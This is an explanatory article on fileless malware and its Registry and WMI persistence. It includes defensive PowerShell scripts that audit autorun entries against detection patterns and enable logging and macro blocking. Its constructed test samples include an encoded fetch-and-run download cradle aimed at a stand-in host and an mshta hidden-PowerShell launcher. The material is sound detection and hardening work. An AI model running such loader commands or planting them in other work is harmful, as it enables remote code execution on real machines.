The Rise of Fileless Malware
Many of the early infectious programs that we now know as malware were written as experiments or pranks. With the expansion of broadband internet, these programs became more frequently designed for profit. Since the late 1990s, many widespread computer viruses, trojans and worms have been designed to take control of end users' computers to steal business, personal and financial information. In recent years these infections have evolved into ransomware, spyware, click fraud and distributed denial-of-service attacks used for profit and sabotage.
Malware is traditionally spread as an executable program copied onto the victim's computer. The executable is typically disguised as, or embedded in, an infected attachment such as a Word document, PDF or JPEG, but it can also arrive on removable media, through mobile devices or through browser "drive-by" downloads. Once it runs, its instructions are loaded into the machine's memory, from where it can download additional malware or "phone home" to the people controlling it. Installation is normally handled by a separate dropper program that writes one or more files to the computer's hard disk and registers them to run again later. It is this on-disk footprint that gives conventional malware its persistence, and it is also what leaves infection "residue" on the host's hard drive that scanners and forensic examiners can find, even when the malware attempts to avoid detection.
The Difference Between Malware and Fileless Malware
Fileless malware drew widespread attention around 2017, although memory-resident code that never touches the disk is older than the label (the network worms of the early 2000s already ran entirely in memory). Building on techniques that had already proved successful, fileless malware aims to run without ever writing its own executable to the infected computer's hard drive.
The code for fileless malware is not delivered as a file that is installed on the victim's machine. Instead, the initial foothold, often a malicious document macro or a script launched from a browser, runs its payload straight from memory using tools that already exist on the system, typically PowerShell or Windows Management Instrumentation (WMI), and persists by storing a script or an encoded command in the Windows Registry (for example in a Run key, which Windows reads at startup) or in a WMI event subscription that re-launches it at boot or on a schedule. The Registry hives are themselves files on disk, but no new executable is ever written, so security strategies built around files, such as file-based whitelisting, signature detection, pattern analysis of file contents and file time-stamping, have nothing to examine. The attack also leaves very little evidence that digital forensic investigators can use to reconstruct the malicious activity after a data breach or security incident: once the host reboots the in-memory payload is gone, and only the small launcher entry remains.
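The persistence locations described above can be audited directly. The following PowerShell script is an added example, not code from the original article: it reads the Run/RunOnce keys and the permanent WMI event subscriptions, flags launcher command lines that show the usual fileless indicators (encoded commands, hidden windows, in-memory downloads, script hosts such as mshta), and decodes any -EncodedCommand payload so the real script is visible. The registry paths and the root\subscription WMI class are real; the function names and indicator list are this example's own choices, and the sample entries at the bottom are constructed so the classifier can be exercised offline.

```powershell
# Added example: audit fileless persistence locations and flag suspicious launcher command lines.

# Indicators commonly seen in PowerShell-based loaders. Constructed list; tune for your environment.
$SuspiciousPatterns = @(
    '-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}',   # base64-encoded command
    '-(w|win|windowstyle)\s+hidden',                       # hidden console window
    '-(nop|noprofile)\b',
    '\biex\b|invoke-expression',
    'downloadstring|downloadfile|invoke-webrequest|net\.webclient',
    'frombase64string',
    'mshta\.exe|regsvr32\.exe.*scrobj|rundll32\.exe.*javascript',
    'wscript\.shell'
)

function Test-SuspiciousCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    $hits = foreach ($p in $SuspiciousPatterns) {
        if ($CommandLine -imatch $p) { $p }
    }
    # -EncodedCommand carries UTF-16LE text in base64; decode it so the real script is visible.
    $decoded = $null
    if ($CommandLine -imatch '-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})') {
        try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
        catch { $decoded = '<invalid base64>' }
    }
    [pscustomobject]@{
        Suspicious = (@($hits).Count -gt 0)
        Indicators = @($hits)
        Decoded    = $decoded
    }
}

function Get-AutorunCommandLines {
    # Run/RunOnce keys for the machine and the current user (other users' HKCU hives are not covered).
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        foreach ($prop in (Get-ItemProperty -Path $k).PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }     # skip PSPath, PSParentPath, PSProvider, ...
            [pscustomobject]@{ Source = "$k\$($prop.Name)"; CommandLine = [string]$prop.Value }
        }
    }
}

function Get-WmiSubscriptionCommandLines {
    # A permanent WMI subscription (event filter + CommandLineEventConsumer + binding) runs a
    # command when an event such as boot fires, with no file on disk. Reading root\subscription needs admin.
    try {
        Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer -ErrorAction Stop |
            ForEach-Object {
                [pscustomobject]@{ Source = "WMI consumer '$($_.Name)'"; CommandLine = [string]$_.CommandLineTemplate }
            }
    } catch { Write-Warning "Could not read root\subscription: $($_.Exception.Message)" }
}

# Constructed sample entries (not taken from any real host) so the classifier can be exercised offline.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage2.ps1")'))
$samples = @(
    [pscustomobject]@{ Source = 'sample 1'; CommandLine = '"C:\Program Files\Vendor\Updater.exe" /background' },
    [pscustomobject]@{ Source = 'sample 2'; CommandLine = "powershell.exe -nop -w hidden -enc $encoded" },
    [pscustomobject]@{ Source = 'sample 3'; CommandLine = 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -w hidden"",0")' }
)

$entries = $samples + @(Get-AutorunCommandLines) + @(Get-WmiSubscriptionCommandLines)
foreach ($e in $entries) {
    $verdict = Test-SuspiciousCommandLine -CommandLine $e.CommandLine
    if (-not $verdict.Suspicious) { continue }
    Write-Output "[!] $($e.Source)"
    Write-Output "    cmd:        $($e.CommandLine)"
    Write-Output "    indicators: $($verdict.Indicators -join ' | ')"
    if ($verdict.Decoded) { Write-Output "    decoded:    $($verdict.Decoded)" }
}
```

Run it from an elevated prompt so the WMI subscription namespace is readable. Samples 2 and 3 are reported and sample 1 is not; on a live host anything else reported deserves a look, remembering that legitimate management software occasionally uses an encoded command, so the decoded text is what decides.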
Much of the response to fileless attacks has come from the platform vendor rather than from traditional anti-malware products. Because these attacks run through Windows' own management tooling, Microsoft added the Antimalware Scan Interface (AMSI) to Windows 10 so that Windows Defender and other registered engines can inspect PowerShell, script-host and Office macro content at the moment it executes rather than when a file is written, and PowerShell 5 gained script block logging that records even code assembled in memory. Windows Defender and the Office 365 threat-protection services build on these hooks to detect irregular PowerShell and Windows Management Instrumentation activity.
Avoiding Fileless Malware Attacks
Defence against any type of malware begins with keeping software up to date. Patches close the vulnerabilities that give fileless attacks their initial foothold, and newer Windows builds together with PowerShell 5 and later carry the logging and inspection hooks (script block logging, AMSI) that make abuse of PowerShell and WMI visible, so ensuring Windows machines are up to date should be a priority. Note that PowerShell and WMI are legitimate administration tools and are not "blocked" by updates; the aim is to make their misuse observable and to restrict who may run them.
Microsoft Office has macros turned off by default, but it is still important to remind employees not to enable macros in attachments. Macro-enabled documents are in fact one of the most common entry points for fileless attacks: the macro never drops an executable, it simply launches PowerShell or a WMI call that pulls the payload straight into memory. Enforce the default through policy so that a user cannot click "Enable Content", and block macros in files that were downloaded from the internet.
Disable Flash. Adobe ended support for Flash Player at the end of 2020 and current browsers have removed it, but older browser installations may still carry the plugin: on most websites Flash has long been replaced with HTML5, Chrome and Firefox both provide the option to block it, and in Internet Explorer disabling ActiveX prevents Flash from loading.
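The logging and macro controls from the steps above can be applied through the same registry policy keys that Group Policy writes. The script below is an added example, not configuration from the original article or from Microsoft's documentation: it enables PowerShell script block logging, module logging and transcription, disables Office macros for the current user, and finishes with a query that shows how the resulting 4104 events can be searched. It assumes an elevated prompt, an Office build that uses the 16.0 policy key (Office 2016 and later), and a placeholder transcript directory; the helper name Set-PolicyValue is this example's own.

```powershell
# Added example: enable PowerShell logging and restrict Office macros via policy registry keys.
# Run elevated. Paths under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell are the
# same ones the corresponding Group Policy settings write.

$PsPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    param([string]$Path, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

# 1. Script block logging: every script block PowerShell compiles is written to the
#    Microsoft-Windows-PowerShell/Operational log as event 4104, including code that
#    arrived via -EncodedCommand or was built with Invoke-Expression at run time.
Set-PolicyValue "$PsPolicy\ScriptBlockLogging" 'EnableScriptBlockLogging' 1

# 2. Module logging: pipeline execution details (event 4103) for all modules.
Set-PolicyValue "$PsPolicy\ModuleLogging" 'EnableModuleLogging' 1
Set-PolicyValue "$PsPolicy\ModuleLogging\ModuleNames" '*' '*' 'String'

# 3. Transcription: a text record of each session. C:\PSTranscripts is a placeholder;
#    in practice point this at a write-only network share the attacker cannot edit.
Set-PolicyValue "$PsPolicy\Transcription" 'EnableTranscripting' 1
Set-PolicyValue "$PsPolicy\Transcription" 'EnableInvocationHeader' 1
Set-PolicyValue "$PsPolicy\Transcription" 'OutputDirectory' 'C:\PSTranscripts' 'String'

# 4. Office macros (per-user policy, hence HKCU). VBAWarnings 4 = disable all macros without
#    notification, so the user never sees an "Enable Content" button; blockcontentexecutionfrominternet 1
#    = block macros in files marked as downloaded from the internet (Office 2016 and later).
foreach ($app in 'Word', 'Excel', 'PowerPoint') {
    $sec = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
    Set-PolicyValue $sec 'VBAWarnings' 4
    Set-PolicyValue $sec 'blockcontentexecutionfrominternet' 1
}

# Verify the PowerShell policy took effect.
Get-ItemProperty "$PsPolicy\ScriptBlockLogging" | Select-Object EnableScriptBlockLogging

# Once logging is on, the same indicators used for autorun entries can be searched in
# the script block events; this returns the most recent matches.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 500 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -imatch 'downloadstring|frombase64string|invoke-expression|net\.webclient' } |
    Select-Object TimeCreated, Message
```

Script block logging records the de-obfuscated text PowerShell actually runs, which is why it matters more for fileless malware than file scanning: an encoded or string-assembled command still lands in the 4104 event in clear. Forward those events to a central log collector, since a payload that gains administrator rights can clear the local log.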